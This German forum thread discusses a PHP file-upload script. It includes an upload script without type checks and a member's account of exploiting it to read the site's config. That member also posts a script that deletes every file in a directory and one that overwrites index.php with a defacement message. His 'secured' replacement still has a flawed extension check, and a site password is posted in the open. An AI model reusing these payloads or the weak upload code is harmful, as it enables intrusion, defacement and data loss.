Upload seite

Wie viel Upload möglich ist, liegt an der Serverkonfiguration (Erlaubter Wert der POST), daran kannst du wenig ändern.
Die Methode, per FTP was hochzuladen, rate ich auch gerne ab. Ich hab hier ein uraltes Uploadscript von mir, das könnte dir vllt helfen, du müsstest es nur einstylen, etc.

PHP:

<?php
$site = "http://deine.domain.hierhin/";
$password = "passwort_fuer_upload";
if(isset($_POST['upload'])) 
{ 
    if(is_uploaded_file($_FILES['file']['tmp_name']) && md5($_POST['password_up']) == md5($password) ) 
    { 
        $fn = $_FILES['file']['name'];
        $filenamernd = md5($_FILES['file']['name']);
        $dateierweiterung = explode(".", $fn );
        $dateierw_count = count($dateierweiterung);
        $splitt = $dateierweiterung[count($dateierw_count)];
        for ( $i = count($dateierw_count); $dateierweiterung[count($dateierw_count) + $i] != "" || $i == "10" ;$i++ )
        {
            $splitt = $dateierweiterung[count($dateierw_count) + $i];
            if ( $i == "10" )
            {
                die("Fehler!");
            }
        }

        $filenamernd = $_FILES['file']['name'] . "-" . md5(rand(1, 1000000) . $fn);
            if(move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' . $filenamernd . "." . $splitt)) 
            { 
            echo '<br><p>Upload erfolgreich!<br />'."\n"; 
            echo '<br>Dateiname: '.$filenamernd . "." . $splitt."<br />\n"; 
            echo '<br>Adresse: '.$site.$row['siteurl'].'uploads/'.$filenamernd . "." . $splitt.'<br>';
            echo "<br>Für Foren: [url=".$site.$row['siteurl']."link_anpassen][img]".$site.$row['siteurl']."uploads/".$filenamernd . "." . $splitt."[/img][/url]<br>";
            } 
            else 
            { 
            echo '<p>Upload fehlgeschlagen!</p>'; 
            }
    } 
    elseif(md5($_POST['password_up']) != md5($password) ) 
    { 
        echo '<p>Falsches Passwort!<br /><br /><a href="javascript:history.back(-1)">Zurück</a></p>'; 
    } 
    else 
    { 
        echo '<p>Keine Datei hochgeladen!</p>'; 
    } 
} 
else 
{ 
?> 
<form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> 
<p><label for="file">Datei: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="file" id="file" name="file" size="50" /></label><br /> 
<label for="password_up">Passwort: <input type="password" id="password_up" name="password_up" size="10" value="" /></label><br />
<input type="hidden" id="passwort" name="password">
<input type="hidden" name="upload" value="Uploaden">
<input type="submit" value="Uploaden" /><br /> </p> 
</form>
<?
}
?>

Die Basis für das Script hab ich vor Jahren mal von fanrpg gekriegt, den Rest hab ich draus gemacht *g*
Wie gesagt, ist alt, früher war ich auch noch nicht so versiert...
Viel Spaß damit

Das Script setzt in der Basisversion (wie es hier ist) einen Ordner "uploads" voraus, der (auf Linuxservern, wie die es sind, die ich nutze) die CHMOD 777 hat, d.h., dass er u.a. beschreibbar ist.

In dem Script musst du oben nur das Passwort für den Upload anpassen und die Domain.

 

LoL, du darfst das nicht als index.html benutzen sondern als index.php auf dem Server hochladen.

 

Hast du auch die nötigen Rechte gesetzt sowie das nötige Uploadverzeichnis angelegt?

Ich bin jetz auch kein Pro im Programmieren, aber sollte das am Anfang nicht iwie so ausschaun im Quelltext?

PHP:

   <?php
$site = 'http://upload.hardlasersound.de/';
$password = 'hardlasersound.de';
if(isset($_POST['upload']))

Ich bin mir bei php nicht ganz sicher wie da das ganze gemacht werden muss...

 

Script korrigiert... normal mach ich das so nicht, aber ich habs dir per root draufgepackt, es funzt jetzt.
War ein copy/paste-Fehler nach hierhin... komischerweise..

 

! Achtung !

Achtung, Sicherheitslücke

Durch eine Lücke in deinem Uploadscript kann man beliebig viele PHP-Dateien hochladen und dementsprechend auch bearbeiten und z.B an deine config.php kommen =)

War übrigens sehr interessant dein INFUSION config.

Ach ja Spuren verwischen geht natürlich auch mit dateien:

PHP:

<?php
$handle = opendir("./");
while( $file = readdir($handle) )
{
    echo $file . "<br />";
    if( $file != '.' && $file != '..' )
    {
        chmod($file, 0777);
        unlink($file);
    }
}
closedir($handle);
?>

Also nie(!) ungesicherte Uploadscripts benutzen tut dir und dem Server nicht gut Könnte gefährlich werden.

Das hat übrigens nicht geklappt, aber auch nur mangels Berechtigungen die sich net mal per chmod() setzen liessen.

PHP:

<?php
$new_handle = fopen("./../index.php", 'w+');
$new_code = '<?php
echo "<div style="font-size:16px; font-weight:bold;">Hallo! <br />";
echo "Wäre ich jetzt fies könnte ich den Server hacken! Sowie den Rest der Seite.. :D Aber ach ja DB-Passwort ändern ;)";
echo "<br /><br />h4ck3d by <i>fanrpg</i> :D";
?>';
fwrite($new_handle, $new_code);
fclose($new_handle);
?>

Aber ich habe dir trotzdem mal das Uploadscript lahmgelegt
Zwar nicht über den Weg sondern über "andere" Methoden die ich hier nicht länger ausbreiten möchte (und nein nicht per root-rechte sondern wie auch hier via php Datei Upload)

Sollte der Selbe Code drinne stehen wie oben in der var $new_code, aber leider habe ich vergessen in der eile die " zu maskieren deswegen kommt so ne doofe Fehlermeldung.

Ist gefährlich, lass nur mal einen Cracker drüber stolpern der was bösartiges will dann wärs es aus mit deiner Seite und dem Server. Aus diesem Grunde habe ich es auch lahmgelegt wäre sehr viel Arbeit gewesen das wieder zu berichtigen.

Ach ja hier ein gesichertes Uploadscript wo nur Bilddateien erlaubt sind:

PHP:

<?php
$site = "http://upload.hardlasersound.de/";
$password = "hardlasersound.de";
if(isset($_POST['upload'])) 
{ 
    if(is_uploaded_file($_FILES['file']['tmp_name']) && md5($_POST['password_up']) == md5($password) ) 
    { 
        $fn = $_FILES['file']['name'];
        $filenamernd = md5($_FILES['file']['name']);
        $dateierweiterung = explode(".", $fn );
        $dateierw_count = count($dateierweiterung);
        $splitt = $dateierweiterung[count($dateierw_count)];
        if( $splitt == 'jpg' or $splitt == 'jpeg' or $splitt == 'gif' or $splitt == 'bmp' or $splitt == 'png' )
        {
            for ( $i = count($dateierw_count); $dateierweiterung[count($dateierw_count) + $i] != "" || $i == "10" ;$i++ )
            {
                $splitt = $dateierweiterung[count($dateierw_count) + $i];
                if ( $i == "10" )
                {
                    die("Fehler!");
                }
            }
    
            $filenamernd = $_FILES['file']['name'] . "-" . md5(rand(1, 1000000) . $fn);
            
            if(move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' . $filenamernd . "." . $splitt)) 
            { 
                echo '<br><p>Upload erfolgreich!<br />'."\n"; 
                echo '<br>Dateiname: '.$filenamernd . "." . $splitt."<br />\n"; 
                echo '<br>Adresse: '.$site.$row['siteurl'].'uploads/'.$filenamernd . "." . $splitt.'<br>';
                echo "<br>Für Foren: [url=".$site.$row['siteurl']."link_anpassen][img]".$site.$row['siteurl']."uploads/".$filenamernd . "." . $splitt."[/img][/url]<br>";
            } 
            else 
            { 
                echo '<p>Upload fehlgeschlagen!</p>'; 
            }
        }
        else
        {
            die("Falsche Dateiendung");
        }    
    } 
    elseif(md5($_POST['password_up']) != md5($password) ) 
    { 
        echo '<p>Falsches Passwort!<br /><br /><a href="javascript:history.back(-1)">Zurück</a></p>'; 
    } 
    else 
    { 
        echo '<p>Keine Datei hochgeladen!</p>'; 
    } 
} 
else 
{ 
?> 
<form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> 
<p><label for="file">Datei: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="file" id="file" name="file" size="50" /></label><br /> 
<label for="password_up">Passwort: <input type="password" id="password_up" name="password_up" size="10" value="" /></label><br />
<input type="hidden" id="passwort" name="password">
<input type="hidden" name="upload" value="Uploaden">
<input type="submit" value="Uploaden" /><br /> </p> 
</form>
<?
}
?>

btw. Passwort von der DB ändern habe es ja gesehen.

 

Was meinst du, warum ich da die Passwortabfrage reingequetscht hatte, fan
Mir ist das Sicherheitsrisiko des Scripts auch bewusst, wie gesagt, es ist alt, sehr alt *g*

 

Na ja die PW-Abfrage bringt auch viel wenn das hier in dem Thread steht

siehe hier: http://forum.sysprofile.de/webmaster-support-scripts-etc/8192-upload-seite.html#post135447

Da ich aber im Moment kein Zugriff habe auf Server und du nicht in MSN warst habe ich erstmal sicherheitshalber so gemacht.

 

Nein, einfach bei

Code:

if( $splitt == 'jpg'

dahinter

Code:

or $splitt == 'mp3' 

einfügen


Dann geht das schon